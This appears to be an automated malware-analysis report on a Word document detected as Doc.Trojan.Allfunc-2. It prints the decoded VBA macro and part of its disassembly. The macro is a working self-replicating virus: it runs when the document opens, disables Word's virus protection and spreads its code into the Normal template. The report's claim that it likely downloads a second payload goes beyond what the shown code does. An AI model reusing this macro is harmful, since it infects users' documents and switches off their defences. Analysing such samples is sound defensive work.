MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The heuristic firings and ClamAV detection strongly indicate malicious intent, likely to download and execute a secondary payload. The VBA code appears to be designed to inject itself into the document or Normal.dot template.
Heuristics 3
-
ClamAV: Doc.Trojan.Allfunc-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Allfunc-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4936 bytes |
SHA-256: 7c7963a09e5606c4f5c5c173f211327d6cf7ef9cd24d9805cd0eca9b83f2ed29 |
|||
|
Detection
ClamAV:
Doc.Trojan.Allfunc-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open(): IT End Sub Private Function IT() Options.ConfirmConversions = 0 Options.SaveNormalPrompt = 0 Options.VirusProtection = 0 If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate Set TargetModule = Target.VBProject.VBComponents.Item(1).CodeModule If TargetModule.CountOfLines = 0 Then TargetModule.AddFromString "Private Sub Document_Open()" & vbCrLf & "End Sub" For X = 1 To TargetModule.CountOfLines If TargetModule.Lines(X, 1) = "Private Function IT()" Then GoTo Quit Next Set Host = ThisDocument.VBProject.VBComponents.Item(1).CodeModule For X = 1 To Host.CountOfLines If Host.Lines(X, 1) = "Private Function IT()" Then GoTo Continue Next Continue: TD = Host.Lines(X, 24) For X = 1 To TargetModule.CountOfLines If Left(TargetModule.Lines(X, 1), 4) = "Sub " Then TargetModule.ReplaceLine X, TargetModule.Lines(X, 1) & ": IT" If Left(TargetModule.Lines(X, 1), 12) = "Private Sub " Then TargetModule.ReplaceLine X, TargetModule.Lines(X, 1) & ": IT" Next TargetModule.AddFromString TD If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName Quit: End Function ' Processing file: /opt/analyzer/scan_staging/ab37d7ebb44f4ec0a717b738e7791cd1.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3227 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' BoS 0x0000 ' ArgsCall IT 0x0000 ' Line #1: ' EndSub ' Line #2: ' FuncDefn (Private Function IT(id_FFFE As Variant)) ' Line #3: ' LitDI2 0x0000 ' Ld Options ' MemSt ConfirmConversions ' Line #4: ' LitDI2 0x0000 ' Ld Options ' MemSt SaveNormalPrompt ' Line #5: ' LitDI2 0x0000 ' Ld Options ' MemSt VirusProtection ' Line #6: ' Ld ThisDocument ' Ld NormalTemplate ' Eq ' If ' BoSImplicit ' SetStmt ' Ld ActiveDocument ' Set Target ' Else ' BoSImplicit ' SetStmt ' Ld NormalTemplate ' Set Target ' EndIf ' Line #7: ' SetStmt ' LitDI2 0x0001 ' Ld Target ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' Set TargetModule ' Line #8: ' Ld TargetModule ' MemLd CountOfLines ' LitDI2 0x0000 ' Eq ' If ' BoSImplicit ' LitStr 0x001B "Private Sub Document_Open()" ' Ld vbCrLf ' Concat ' LitStr 0x0007 "End Sub" ' Concat ' Ld TargetModule ' ArgsMemCall AddFromString 0x0001 ' EndIf ' Line #9: ' StartForVariable ' Ld X ' EndForVariable ' LitDI2 0x0001 ' Ld TargetModule ' MemLd CountOfLines ' For ' Line #10: ' Ld X ' LitDI2 0x0001 ' Ld TargetModule ' ArgsMemLd Lines 0x0002 ' LitStr 0x0015 "Private Function IT()" ' Eq ' If ' BoSImplicit ' GoTo Quit ' EndIf ' Line #11: ' StartForVariable ' Next ' Line #12: ' SetStmt ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' Set Host ' Line #13: ' StartForVariable ' Ld X ' EndForVariable ' LitDI2 0x0001 ' Ld Host ' MemLd CountOfLines ' For ' Line #14: ' Ld X ' LitDI2 0x0001 ' Ld Host ' ArgsMemLd Lines 0x0002 ' LitStr 0x0015 "Private Function IT()" ' Eq ' If ' BoSImplicit ' GoTo Continue ' EndIf ' Line #15: ' StartForVariable ' Next ' Line #16: ' Label Continue ' Line #17: ' Ld X ' LitDI2 0x0018 ' Ld Host ' ArgsMemLd Lines 0x0002 ' St TD ' Line #18: ' StartForVariable ' Ld X ' EndForVariable ' LitDI2 0x0001 ' Ld TargetModule ' MemLd CountOfLines ' For ' Line #19: ' Ld X ' LitDI2 0x0001 ' Ld TargetModule ' ArgsMemLd Lines 0x0002 ' LitDI2 0x0004 ' ArgsLd LBound 0x0002 ' LitStr 0x0004 "Sub " ' Eq ' If ' BoSImplicit ' Ld X ' Ld X ' LitDI2 0x0001 ' Ld TargetModule ' ArgsMemLd Lines 0x0002 ' LitStr 0x ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.